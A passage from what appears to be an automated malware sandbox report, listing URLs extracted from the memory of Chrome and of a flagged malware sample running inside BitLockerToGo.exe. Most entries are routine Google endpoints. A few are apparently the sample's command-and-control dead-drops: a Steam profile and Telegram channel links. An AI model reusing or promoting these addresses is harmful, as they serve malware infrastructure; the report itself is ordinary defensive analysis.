              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
              Source: chrome.exe, 00000006.00000002.2715734588.0000197800744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
              Source: chrome.exe, 00000006.00000002.2718380552.000042E800330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
              Source: chrome.exe, 00000006.00000003.2639287139.000042E8001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
              Source: chrome.exe, 00000006.00000003.2672376514.000042E800FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718619074.000042E8003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000006.00000002.2725735131.000042E800EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
              Source: chrome.exe, 00000006.00000002.2726073930.000042E800FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718938238.000042E800498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720069154.000042E800790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
              Source: chrome.exe, 00000006.00000002.2719865844.000042E8006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720069154.000042E800790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
              Source: chrome.exe, 00000006.00000003.2680495923.000042E80175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680463208.000042E80174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680320689.000042E80173C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680375033.000042E801744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680429971.000042E801748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680261497.000042E801734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680525865.000042E801760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
              Source: chrome.exe, 00000006.00000003.2680495923.000042E80175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680463208.000042E80174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680429971.000042E801748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chromeB
              Source: chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720069154.000042E800790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
              Source: chrome.exe, 00000006.00000002.2718219018.000042E8002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653451478.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721163304.000042E800A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
              Source: chrome.exe, 00000006.00000002.2721427722.000042E800B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
              Source: chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
              Source: chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
              Source: chrome.exe, 00000006.00000002.2721330516.000042E800ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 00000006.00000002.2722342633.000042E800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721330516.000042E800ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649345227.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2683631798.000042E801B6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
              Source: chrome.exe, 00000006.00000002.2721330516.000042E800ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
              Source: chrome.exe, 00000006.00000002.2722342633.000042E800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649345227.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718194671.000042E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
              Source: chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718194671.000042E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
              Source: chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649345227.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2683631798.000042E801B6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 00000006.00000002.2722342633.000042E800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721330516.000042E800ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649345227.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
              Source: chrome.exe, 00000006.00000002.2721330516.000042E800ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722265689.000042E800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649345227.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2724259235.000042E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2683631798.000042E801B6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722203177.000042E800C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
              Source: chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 00000006.00000002.2718219018.000042E8002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653451478.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721163304.000042E800A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
              Source: chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
              Source: chromecache_70.8.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_69.8.drString found in binary or memory: https://plus.google.com
              Source: chromecache_69.8.drString found in binary or memory: https://plus.googleapis.com
              Source: chrome.exe, 00000006.00000002.2721163304.000042E800A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000006.00000002.2717416488.000042E80008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: chrome.exe, 00000006.00000002.2717416488.000042E80008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
              Source: chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: chrome.exe, 00000006.00000002.2718725592.000042E80040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2204909957.000000000A154000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037
              Source: BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037oomaino5Mozilla/5.0
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.0000000005102000.00000004.00000020.00020000.00000000.sdmp, 58y5fk.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050DD000.00000004.00000020.00020000.00000000.sdmp, 58y5fk.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.0000000005102000.00000004.00000020.00020000.00000000.sdmp, 58y5fk.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050DD000.00000004.00000020.00020000.00000000.sdmp, 58y5fk.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D62000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2547614534.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2533843264.0000000002DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/b4cha00
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/b4cha00o
              Source: chrome.exe, 00000006.00000002.2721069161.000042E800A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: BitLockerToGo.exe, 00000004.00000003.2533873662.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2533843264.0000000002DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: chromecache_69.8.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chrome.exe, 00000006.00000002.2719356402.000042E800594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
              Source: chrome.exe, 00000006.00000002.2722067710.000042E800C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
              Source: chrome.exe, 00000006.00000002.2722067710.000042E800C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: chrome.exe, 00000006.00000002.2720224491.000042E80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
              Source: chrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
              Source: chrome.exe, 00000006.00000002.2722399214.000042E800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722029915.000042E800C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720744601.000042E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720340229.000042E800850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722029915.000042E800C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720744601.000042E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720340229.000042E800850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718820448.000042E800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719387751.000042E8005A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chrome.exe, 00000006.00000003.2672376514.000042E800FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
              Source: chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
              Source: chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitB
              Source: chrome.exe, 00000006.00000002.2721131817.000042E800A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
              Source: chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
              Source: chromecache_69.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_69.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chrome.exe, 00000006.00000003.2680495923.000042E80175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680463208.000042E80174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680320689.000042E80173C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680375033.000042E801744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680429971.000042E801748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680261497.000042E801734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680525865.000042E801760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
